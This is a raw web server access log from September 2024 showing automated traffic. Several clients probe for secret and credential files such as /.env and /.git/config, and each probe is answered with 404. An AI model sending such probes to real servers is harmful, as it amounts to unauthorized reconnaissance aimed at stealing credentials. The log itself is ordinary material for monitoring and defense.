154.216.20.215 - - [02/Sep/2024:00:30:14 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.20.215 - - [02/Sep/2024:00:30:14 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.191.126.213 - - [02/Sep/2024:00:30:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [02/Sep/2024:00:31:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.39.118 - - [02/Sep/2024:00:34:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.216.20.249 - - [02/Sep/2024:00:34:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.20.249 - - [02/Sep/2024:00:34:44 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
91.92.249.4 - - [02/Sep/2024:00:34:52 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
91.92.249.4 - - [02/Sep/2024:00:34:52 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
149.50.103.48 - - [02/Sep/2024:00:38:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.216.20.249 - - [02/Sep/2024:00:39:06 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
